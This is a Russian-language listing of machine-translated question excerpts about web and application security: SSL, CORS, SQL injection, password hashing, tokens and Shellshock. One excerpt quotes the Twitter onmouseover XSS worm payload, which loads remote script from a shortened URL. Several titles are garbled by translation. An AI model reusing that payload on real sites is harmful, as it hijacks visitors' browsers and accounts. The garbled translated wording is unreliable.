security

Разрешение Java использовать ненадежный сертификат для соединения SSL / HTTPS

Я работал над программой для извлечения информации из динамического веб-приложения, и программа работала нормально, пока я не установил свой сервер tomcat для использования SSL с использованием самозаверяющего(таким образом, ненадежного) сертификата. ...

Безопасно ли использовать $.поддержка.cors = true; в jQuery?

Я пытался попасть в веб-службу в другом домене, используя метод ajax jQuery. После проведения некоторых исследований похоже, что это не позволяет сделать это по дизайну, чтобы предотвратить межсайтовые сценарии. я наткнулся на работу, вокруг кото ...

Примеры SQL-инъекций через addslashes ()?

в PHP, я знаю, что mysql_real_escape гораздо безопаснее, чем с помощью addslashes. Однако я не смог найти пример ситуации, когда addslashes позволит SQL-инъекции произойти. может кто-нибудь привести несколько примеров? ...

Почему Ява.безопасность.NoSuchProviderException нет такого провайдера: BC?

jar (bcprov-jdk16-145.jar) был добавлен в проект,Security.addProvider(new org.bouncycastle.jce.provider.BouncyCastleProvider()) был добавлен в класс, и BouncyCastleProvider.PROVIDER_NAME возвращает "BC", но AesFileIo.writeFile () по-прежнему бросает ...

Сегодняшний эксплойт XSS onmouseover включен twitter.com

можете ли вы объяснить, что именно произошло сегодня в Twitter? В основном эксплойт заставлял людей публиковать твит, содержащий эту ссылку: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7') ...

Массивы в cookies PHP

Как правильно хранить массив в cookie? в PHP Пример кода: $number_ticket=2; $info[7][5]=1; $info[8][5]=1; ...

Какие общие веб-эксплойты я должен знать? [закрытый]

Я довольно зеленый все еще, когда дело доходит до веб-программирования, я провел большую часть своего времени на клиентских приложениях. Поэтому мне любопытно, какие общие подвиги я должен бояться/тестировать на своем сайте. ...

Встраивание видео youtube " отказано в отображении документа, поскольку отображение запрещено X-Frame-Options"

Я пытаюсь вставить видео youtube на мою страницу, как только пользователь дает ссылку на видео. <iframe width=\'560\' height=\'315\' src='http://www.youtube.com/watch?v=<video id>&amp;output=embed' frameborder=\'0\' allowfullscreen>& ...

Каков в настоящее время наиболее безопасный алгоритм одностороннего шифрования?

как многие знают, одностороннее шифрование-это удобный способ шифрования паролей пользователей в базах данных. Таким образом, даже администратор базы данных не может знать пароль пользователя, но должен будет угадать пароль, зашифровать его с помощью ...

Как создать хешированный пароль фреймворк Laravel

Я пытаюсь создать хэшированный пароль для Laravel. Теперь кто-то сказал мне использовать Laravel hash helper, но я не могу его найти, или я смотрю в неправильном направлении. Как создать хэшированный пароль laravel? И где же? изменить: Я знаю, что ...

В чем преимущество осуществляется за скрипт? [закрытый]

Я ищу способы безопасного хранения паролей. Некоторые люди утверждают, что scrypt "лучше", чем bcrypt, и до сих пор я не видел никого, кто утверждает наоборот или что scrypt небезопасен, хотя некоторые называют bcrypt "более авторитетным". в чем пре ...

Безопасно хранить идентификаторы OpenID и OAuth токены

Я создаю веб-приложение, которое будет использовать логины OpenID и токены OAuth с Youtube. В настоящее время я храню идентификатор OpenID и OAuth token/token secret в виде обычного текста в базе данных. неуместно ли хранить эти значения в виде обы ...

Как реализовать соль в моем логине для паролей?

Я хочу реализовать соль в моей системе входа в систему, но я немного запутался в том, как это должно работать. Я не могу понять логику этого. Я понимаю, что md5-это односторонний алгоритм, и все функции, с которыми я столкнулся, похоже, хешируют все ...

В SQL Server 2005 С Как изменить имя для входа в систему ДБО

У меня есть база данных с пользователем 'dbo', который имеет имя Входа "domain\xzy". Как изменить его с "domain\xzy"на" domain\abc". ...

Является ли поведение уязвимости Shellshock в Bash документированным или вообще преднамеренным?

недавняя уязвимость, CVE-2014-6271, как Баш интерпретирует переменные среды была раскрыта. Эксплойт основан на анализе Bash некоторых объявлений переменных среды как определений функций, но затем продолжает выполнять код после определения: $ x='() { ...

Защита пароля в файле свойств [дубликат]

этот вопрос уже есть ответ здесь: шифровать пароль в конфигурационных файлах? [закрыто] 10 ответов У меня есть Java-приложение, которое подключается к базе д ...

Создание криптографически защищенных маркеров аутентификации

Справочная информация: Это действительно общий вопрос о лучших практиках, но некоторые сведения о конкретной ситуации могут быть полезны: мы разрабатываем "подключенное" приложение для iPhone. Он будет взаимодействовать с серверным приложением чер ...

"Тестовая форма доступна только для запросов от локальной машины."

Я создал веб-службу в .Net, и поэтому адрес файла службы имеет отличное автоматическое сгенерированное объяснение о том, как это работает. Когда я запускаю страницу с машины, на ней даже есть форма, которую я могу использовать для отправки тестовых з ...

Является ли время () хорошей солью?

Я смотрю на какой-то код, который я не написал сам. Код пытается хэшировать пароль с помощью SHA512 и использует только time() как соль. Это time() слишком простая соль для этого или этот код безопасен? Спасибо за ответы и комментарии. Я подведу ито ...

Создание криптографически защищенных токенов

чтобы создать 32-символьный токен для доступа к нашему API, мы в настоящее время используем: $token = md5(uniqid(mt_rand(), true)); Я читал, что этот метод не является криптографически безопасным, поскольку он основан на системных часах, и что ope ...